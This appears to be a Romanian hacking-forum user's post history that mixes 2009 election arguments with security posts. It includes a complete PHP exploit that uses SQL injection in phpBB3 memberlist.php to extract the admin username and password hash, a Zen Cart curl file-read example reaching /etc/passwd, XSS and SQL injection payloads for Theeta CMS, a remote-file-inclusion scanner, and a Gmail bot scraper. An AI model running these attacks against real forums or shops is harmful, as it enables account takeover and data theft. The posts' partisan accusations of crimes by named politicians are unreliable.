-
Posts
381 -
Joined
-
Last visited
-
Days Won
1
Everything posted by hozarares
-
Reformele au inceput demult....iar ca sa dea randament tre` sa punem si noi osu` la munca !!!
-
Vezi daca te ajuta cu ceva videclipu` asta http://video.google.com/googleplayer.swf?docId=-1162077930592014920&hl=en
-
Usually, curl is used to connect and retrieve data from a remote URL using the http protocol. However, curl supports a bunch of protocols. One of these protocols is the file protocol. Using this protocol you can read local files by using an URL like file:///etc/passwd. Therefore, if the user can control the URL passed to curl_exec, in some cases (if the content is echoed back) he can read local files. Vulnerabilitatea afecteaza " /zen-cart/extras/curltest.php " Exemplu : http://site/zen-cart/extras/curltest.php?url=http://192.168.0.1 or http://site/zen-cart/extras/curltest.php?url=http://192.168.1.1. http://site/zen-cart/extras/curltest.php?url=file:///etc/passwd Vulnerabilitatea descoperita de catre Bogdan Calin ( Acunetix )
-
Ai lovit`o ?
-
Hai sa respectam opiniile tuturor dar cel putin sa aduca argumente.Atata N-W-A...argumente; caci nu o zic cu rautate ci din cunostiinta de cauza. In rest numai de bine.....
-
N-W-A....nu ai destui ani cat sa votezi dar vezi lucruri evidente.....si esti intr`un mediu activ financiar. No Comment !!!
-
Pentru N-W-A si cei care gandesc ca el in privinta alegerilor prezidentiale 2009..... Poate ca nu are "fatza" Basescu de a fi presedinte dar s`a dovedit ca are caracter,este roman,este pentru oameni si vrea sa puna tara pe picioare.Reformele nu au efect peste noapte iar daca nici noi nu punem osu` la treaba atunci ajungem mai rau decat Trinidad Tobago. Enumera`mi si mie ce au facut FSN alias PSD + PNL din `90 incoace si ce a facut PD`L in 5 ani.Multi il blameaza pe presedinte pentru impozitul forfetar; dar nu uita:firmele alea care au cazut erau mai mult de 60%, firme fantoma, iar diferenta de 40% nu produceau nimic ca sa`si plateasca taxele la stat.Iti spun asta ca lucrez in domeniu de 5 ani. Pentru cei care au experienta financiara stiti ca legea asta este foarte buna daca se aplica. De ce crezi ca mai mult de 50% dintre romani voteaza un om si cei sub 50% voteaza o coalitie...duhhhhh.....S`AU SATURAT...M`AM SATURAT...NE`AM SATURAT de comunism si de combinatii politice.Cortina de Fier a cazut de mult dar sunt cativa care cred ca ea mai exista......Doamne cate ar mai fi de spus......
-
http://www.b1tv.ro ########################################################### jtablesession::Store Failed DB function failed with error number 1194 Table 'jos_session' is marked as crashed and should be repaired SQL=INSERT INTO `jos_session` ( `session_id`,`time`,`username`,`gid`,`guest`,`client_id` ) VALUES ( 'iqbtoputt5o4clkiflaaip59s4','1260136047','','0','1','0' ) ########################################################### Cine explica eroarea asta ? ___________________________ Basescu 50,4 Geoana & Co 49,6 ___________________________
-
Mintomar a mai facut erori foarte grave.La alegerile legislative a avut o marja de eroare in favoarea PSD de peste 6%..... In afara faptului ca ciobanu` ranjeste, mai este si C.V. Tudor care din mare Tribun si mare Patriot a venit prin emsiuni cu medaliile oferite dansului de catre tov Iliescu Ion.... Basescu por la patria !!!
-
Daca iese Geoana atunci revine din nou comunismul democratic la ce folos toti mortii din `89 ? Hai Basescu....macar asta incearca sa faca ceva.Si e timpul sa ne schimbam si noi mentalitatea ," sa pice din cer ".Daca nu punem nici noi osu` la munca, atunci poate sa vina orice presedinte ca tot idioti vom ramane si ne vom merita soarta.
-
Crack/Keygen Sites That Are Safe To Use
hozarares replied to CyberWolf08's topic in Stiri securitate
WWW.CRACKS.AM - the oldest and largest source of cracks, patches, keygens and serials - since 1999! cel mai "batran" si inca sigur...... -
Hopa...scuze....adevaru`i ca nu am verificat nimic din ce am postat azi noapte.Sorry
-
#!/usr/bin/php -q -d short_open_tag=on <? echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure\n"; echo "by rgod rgod@autistici.org\n"; echo "site: http://retrogod.altervista.org\n"; echo "dork, version specific: \"Powered by phpBB * 2002, 2009 phpBB Group\"\n\n"; /* works regardless of php.ini settings you need a global moderator account with "simple moderator" role */ if ($argc<5) { echo "Usage: php ".$argv[0]." host path user pass OPTIONS\n"; echo "host: target server (ip/hostname)\n"; echo "path: path to phpbb3\n"; echo "user/pass: u need a valid user account with global moderator rights\n"; echo "Options:\n"; echo " -T[prefix] specify a table prefix different from default (phpbb_)\n"; echo " -p[port]: specify a port other than 80\n"; echo " -P[ip:port]: specify a proxy\n"; echo " -u[number]: specify a user id other than 2 (admin)\n"; echo " -x: disclose table prefix through error messages\n"; echo "Example:\r\n"; echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u\r\n"; echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7\n"; die; } error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\ '; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h tml))) { $html.=fread($ock,1); } } fclose($ock); #debug #echo "\r\n".$html; } $host=$argv[1]; $path=$argv[2]; $user=$argv[3]; $pass=$argv[4]; $port=80; $prefix="PHPBB_"; $user_id="2";//admin $discl=0; $proxy=""; for ($i=3; $i<=$argc-1; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } if ($temp=="-T") { $prefix=str_replace("-T","",$argv[$i]); } if ($temp=="-u") { $user_id=str_replace("-u","",$argv[$i]); } if ($temp=="-x") { $discl=1; } } if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} $data="username=".urlencode($user); $data.="&password=".urlencode($pass); $data.="&redirect=index.php"; $data.="&login=Login"; $packet="POST ".$p."ucp.php?mode=login HTTP/1.0\r\n"; $packet.="Referer: http://$host$path/ucp.php?mode=login\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); $cookie=""; $temp=explode("Set-Cookie: ",$html); for ($i=1; $i<=count($temp)-1; $i++) { $temp2=explode(" ",$temp[$i]); $cookie.=" ".$temp2[0]; } if (eregi("_u=1;",$cookie)) { //echo $html."\n";//debug //die("Unable to login..."); } echo "cookie -> ".$cookie."\r\n"; if ($discl) { $sql="'suntzuuuuu"; echo "sql -> ".$sql."\n"; $sql=urlencode(strtoupper($sql)); $data="username="; $data.="&icq="; $data.="&email="; $data.="&aim="; $data.="&joined_select=lt"; $data.="&joined="; $data.="&yahoo="; $data.="&active_select=lt"; $data.="&active="; $data.="&msn="; $data.="&count_select=eq"; $data.="&count="; $data.="&jabber="; $data.="&sk=c"; $data.="&sd=a"; $data.="&ip=".$sql; $data.="&search_group_id=0"; $data.="&submit=Search"; $packet="POST ".$p."memberlist.php?joined_select=lt&active_s elec t=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post &field=username_list&mode=searchuser&form=post HTTP/1.0\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cookie: ".$cookie." \r\n\r\n"; $packet.=$data; sendpacketii($packet); if (strstr($html,"You have an error in your SQL syntax")) { $temp=explode("posts",$html); $temp2=explode(" ",$temp[0]); $prefix=strtoupper($temp2[count($temp2)-1]); echo "prefix -> ".$prefix."\n";sleep(2); } } $md5s[0]=0;//null $md5s=array_merge($md5s,range(48,57)); //numbers $md5s=array_merge($md5s,range(97,102));//a-f letters //print_r(array_values($md5s)); $j=1;$password=""; while (!strstr($password,chr(0))) { for ($i=0; $i<=255; $i++) { if (in_array($i,$md5s)) { $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$us er_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999"; echo "sql -> ".$sql."\n"; $sql=urlencode(strtoupper($sql)); $data="username="; $data.="&icq="; $data.="&email="; $data.="&aim="; $data.="&joined_select=lt"; $data.="&joined="; $data.="&yahoo="; $data.="&active_select=lt"; $data.="&active="; $data.="&msn="; $data.="&count_select=eq"; $data.="&count="; $data.="&jabber="; $data.="&sk=c"; $data.="&sd=a"; $data.="&ip=".$sql; $data.="&search_group_id=0"; $data.="&submit=Search"; $packet="POST ".$p."memberlist.php?joined_select=lt&active_s elec t=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post &field=username_list&mode=searchuser&form=post HTTP/1.0\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cookie: ".$cookie." \r\n\r\n"; $packet.=$data; sendpacketii($packet); if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;} } if ($i==255) {die("Exploit failed...");} } $j++; } $j=1;$admin=""; while (!strstr($admin,chr(0))) { for ($i=0; $i<=255; $i++) { $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id ,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999"; echo "sql -> ".$sql."\n"; $sql=urlencode(strtoupper($sql)); $data="username="; $data.="&icq="; $data.="&email="; $data.="&aim="; $data.="&joined_select=lt"; $data.="&joined="; $data.="&yahoo="; $data.="&active_select=lt"; $data.="&active="; $data.="&msn="; $data.="&count_select=eq"; $data.="&count="; $data.="&jabber="; $data.="&sk=c"; $data.="&sd=a"; $data.="&ip=".$sql; $data.="&search_group_id=0"; $data.="&submit=Search"; $packet="POST ".$p."memberlist.php?joined_select=lt&active_s elec t=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post &field=username_list&mode=searchuser&form=post HTTP/1.0\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cookie: ".$cookie." \r\n\r\n"; $packet.=$data; sendpacketii($packet); if (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]\r\n";sleep(2);break;} } if ($i==255) {die("Exploit failed...");} $j++; } echo "--------------------------------------------------------------------\r\n"; echo "admin -> ".$admin."\r\n"; echo "password (md5) -> ".$password."\r\n"; echo "--------------------------------------------------------------------\r\n"; function is_hash($hash) { if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} else {return false;} } if (is_hash($password)) {echo "Exploit succeeded...";} else {echo "Exploit failed...";} ?>
-
################################################################## ################################################################## # ___ ___ _ _____ __ _ # # / _ \ / _ \| | | __ \ / _| | | # # _ __| | | | | | | |_| | | | ___| |_ __ _ ___ ___ __| | # # | '__| | | | | | | __| | | |/ _ \ _/ _` |/ __/ _ \/ _` | # # | | | |_| | |_| | |_| |__| | __/ || (_| | (_| __/ (_| | # # |_| \___/ \___/ \__|_____/ \___|_| \__,_|\___\___|\__,_| # # # # # # +-+-+-+-+ # # |C|r|e|w| # # +-+-+-+-+ # ################################################################## ################################################################## # [#] Theeta CMS (Cross Site Scripting,SQL Injection) Multiple Vulnerabilities # # [#] Discovered By c0dy # # [#] r00tDefaced | (In)Security Syndicate - Powered by vBulletin # # [#] Greetz: sHoKeD-bYte, syst0x1c & r00tDefaced Members # ################################################################## # # [1]-Cross Site Scripting # # Vulnerability Description: # Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code #injection by malicious web users into the web pages viewed by other users. # # Affected items: # http://127.0.0.1/community/thread.php?start=[XSS] # http://127.0.0.1/community/thread.php?forum=[XSS] # http://127.0.0.1/community/thread.php?cat=[XSS] # http://127.0.0.1/community/forum.php?start=[XSS] # http://127.0.0.1/community/forum.php?cat=[XSS] # http://127.0.0.1/blog/index.php?start=[XSS] # # # Exemple: <script>alert(document.cookie)</script> # # The Risk: # By exploiting this vulnerability, an attacker can inject malicious code in the script and can stole cookies. # # Fix the vulnerability: # * Encode output based on input parameters. # * Filter input parameters for special characters. # * Filter output based on input parameters for special characters... # ################################################################# # # [2]-SQL injection # # Vulnerability Description: # SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an #application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL #statements or user input is not strongly typed and thereby unexpectedly executed. # # Affected items: # http://127.0.0.1/community/forum.php?start=[sql Injection] # http://127.0.0.1/community/thread.php?start=[sql Injection] # http://127.0.0.1/blog/index.php?start=[sql Injection] # # Exemple: -1+ORDER+BY+1-- [You can find the number of colums (Well just incrementing the number until we get an error.)] # # The Risk: # By exploiting this vulnerability, an attacker can inject malicious code in the script and can have acces to the database. # # Fix the vulnerability: # To protect against SQL injection, user input must not directly be embedded in SQL statements. Instead, parameterized statements must be used #(preferred), or user input must be carefully escaped or filtered. # ################################################################# ################################################################# # r00tDefaced [2009-12-01]
-
#!/usr/bin/env python # GMail Bot Control Framework # hush hush time time # # Modified by RoCracker # import urllib2, ClientForm, os opener = urllib2.build_opener(urllib2.HTTPCookieProcessor()) opener.addheaders = [(\'User-agent\', \'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)\')] urllib2.install_opener(opener) class GMail: def __init__(self, username, password): self.username = username self.password = password def login(self): url = \"http://gmail.com\" page = urllib2.urlopen(url) forms = ClientForm.ParseResponse(page, backwards_compat=False) form = forms[0] form[\"Email\"] = self.username form[\"Passwd\"] = self.password req = form.click() res = urllib2.urlopen(req).read() if \"refresh\" in res: return True return False def retrieve_unread_messages(self): \"\"\" Stops after encountering an entire page of read messages. \"\"\" url = \"http://mail.google.com/mail/?ui=html&zy=e\" page = urllib2.urlopen(url).read() url = page.split(\"url='\")[1].split(\"'\\\"\")[0] base_url = url.replace(\"&\", \"&\") messages = [] start = 0 while True: if not start: url = base_url else: url = base_url + \"&st=%d\" % start page = urllib2.urlopen(url).read() page = page.split(\"<tr bgcolor=\\\"#ffffff\\\">\") if len(page) == 1: break else: page = page[1:] for message in page: message_from = message.split(\"<b>\")[1].split(\"</b>\")[0] message_subject = message.split(\"</font></font>\")[1].split(\"</b>\")[0] message_subject = message_subject.lstrip() message_subject = message_subject.rstrip() if message_subject.startswith(\"<b>\"): message_subject = message_subject.split(\"<b>\")[1] message_url = message.split(\"<a href=\\\"?\")[1].split(\"\\\"\")[0] message_url = \"%s&%s\" % (base_url, message_url) messages.append([message_from, message_subject, message_url]) start += 50 return messages def retrieve_message(self, url): page = urllib2.urlopen(url).read() return page
-
:::=== RFISCANNER.JAVA ===::: package rrfiscanner; import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader; import java.net.MalformedURLException; import java.net.Proxy; import java.net.URL; import java.net.URLConnection; public class RfiScanner { private Proxy _conProxy; private boolean _useProxy; private String _SEARCH_WORD; private String _vUrl,_aUrl; /** * @param args */ public RfiScanner(String vUrl,String aUrl) { this._vUrl = vUrl; this._aUrl = aUrl; } public void setUseProxy(boolean use){ this._useProxy = use; } public void setProxy(Proxy proxy){ this._conProxy = proxy; } public void setSearchWord(String word){ this._SEARCH_WORD = word; } public void scan(){ try { PrepareURL victimURL = new PrepareURL(_vUrl,_aUrl); URLConnection uc = null; while(victimURL.hasNext()) { URL u = victimURL.next(); if (_useProxy) { uc = u.openConnection(_conProxy); } else { uc = u.openConnection(); } try{ System.out.println("SCANNING: " + u.toString()); BufferedReader r = new BufferedReader(new InputStreamReader(uc.getInputStream())); String c; while ((c = r.readLine()) != null) { if(c.indexOf(_SEARCH_WORD) != -1) { System.out.println("VULNERABLE URL: " + u.toString()); break;//stop searching } } }catch(IOException ioe){ //well do nothing } } } catch (MalformedURLException mfue) { System.err.println(mfue.toString()); } catch (Exception e) { System.err.println(e.toString()); } } } :::=== PREPAREURL.JAVA ===::: package rrfiscanner; import java.net.MalformedURLException; import java.net.URL; import java.util.ArrayList; import java.util.HashMap; import java.util.Iterator; import java.util.Set; public class PrepareURL { private static final int _nextItemInitialize = -1; private String _victimURL; private String _evilUrl; private ArrayList<URL> _attackUrlList; private int _nextItem; /** * @param victimUrl The URL of the site you want to inject stuff into it's params * @param attackUrl The "stuff" * @throws MalformedURLException Wrong URL */ public PrepareURL(String victimUrl,String attackUrl) throws MalformedURLException { this._victimURL = victimUrl; this._evilUrl = attackUrl; _nextItem = _nextItemInitialize; fillList(); } /** * @return True if there is another element left, false otherwise */ public boolean hasNext() { if(_nextItem == (_attackUrlList.size()-1)) { return false; } return true; } /** * @return Get the next url */ public URL next() { _nextItem++; return _attackUrlList.get(_nextItem); } /** * This resets the class so you can loop again through the URL's */ public void reset() { _nextItem = _nextItemInitialize; } private void fillList() throws MalformedURLException { String query = _victimURL.substring(_victimURL.indexOf("?")+1); _attackUrlList = new ArrayList<URL>(); if(query != null) { HashMap<String,String> paramPairs = getParameters(query); Set<String> paramNames = paramPairs.keySet(); Iterator<String> iParamNames = paramNames.iterator(); String str; while(iParamNames.hasNext()) { str = iParamNames.next(); _attackUrlList.add(new URL(_victimURL.replace(str+"="+paramPairs.get(str), str+"="+_evilUrl))); } } } /** * @param query The query to be stripped down to parameters and it's values * @return A HashMap with paramname:paramvalue */ private HashMap<String,String> getParameters(String query) { HashMap<String,String> paramPairs = new HashMap<String,String>(); String[] rawPairs = query.split("&"); for(int i=0;i<rawPairs.length;i++) { String[] keyValue = rawPairs.split("="); for(int z=0;z<keyValue.length;z+=2) { paramPairs.put(keyValue[z], keyValue[z+1]); } } return paramPairs; } }
-
Pai il discutam draga N-W-A.... Il sustin pe Basescu cu votul meu !!! Daca nu facem politica si/sau polemica pe tema politicii romanesti e ca si cum ai fi un peste cu carligu` in bot si sa te plimbe altu.... Oricum, cui nu`i place topicu` politic pe care il postez si pe care le voi posta il rog frumos sa nu citeasca si/sau sa dea un raspuns . Va multumesc anticipat pentru intelegere !!!
-
Trebuia sa`l verifici inainte sa`l postezi, nu sa te iei dupa ce zice unu` si altu`. Chestia care ai pus`o este un fake ordinar.Eu am 2 versiuni full.Niici chiar aia de la nosec.org nu au serverele chiar asa de sigure.......
-
Eu am preluat de pe B1Tv dar munca apartine celor de la cotidianul Curentul. Curentul - Prima pagin?
-
Mah....du`te si fa`ti un control la cap......chestiile astea DOS nu merg de pe programe " facute noaptea " si vandute pe deasupra cu 20 Euro.....Pleaca mah ca`i iei vopseaua,pleaca de`aici.....
-
Nicolae Popa, cel care a semnat si a scos pentru Sorin Ovidiu Vantu TOTI banii de la FNI a fost arestat de catre INTERPOL in capitala Indonesiei,Jakarta. Ce legatura este intre Mircea Geoana si Nicolae Popa ? E simplu, in anul 2004 Nicolae Popa a cerut la ambasada Romaniei din Indonesia o prelungire de pasaport; dar ca fiind sub urmarire internationala nu a putut avea acel pasaport prelungit fara ajutorul lui Mircea Geoana, care atentie, a fost MINISTRUL DE EXTERNE al Romaniei in anul 2004.( imi cer scuze daca ma repet ) Ieri la miezu` noptii,Mircea Geoana face o vizita acasa la Sorin Ovidiu Vantu si este fotografiat de catre reporterii de la Academia Catavencu. In confruntarea din aceasta seara , presedintele Traian Basescu il intreaba pe Mircea Geoana daca a fost la S.O. Vantu ieri noapte si daca il stie pe, atentie din nou, "dl. Popa".La inceput neaga orice fel de relatie cu S.O.Vantu, pe urma recunoaste.Mircea Geoana a jurat pe BIBLIE ca nu`l stie pe "Nicolae Popa" ( prostie sau gafa din partea lui Geoany ?) Acestia sunt cei de la PSD....votati comunisti mincinosi ,lasi ,criminali si nenorociti !!! Unde esti tu Tepes, Doamne ? P.S. : Daca cade Nicolae Popa cade si S.O.Vantu, Geoana , Patriciu....etc.... Doamne Ajuta !!!
-
Pentru cei care au probleme cu PC`ul in "recuperarea" parolei va sugerez acest mic program. Click AICI pentru descarcare
-
Ce versiune zici ca este ? Da eroare la descarcat.Pune`l pe Megaupload.com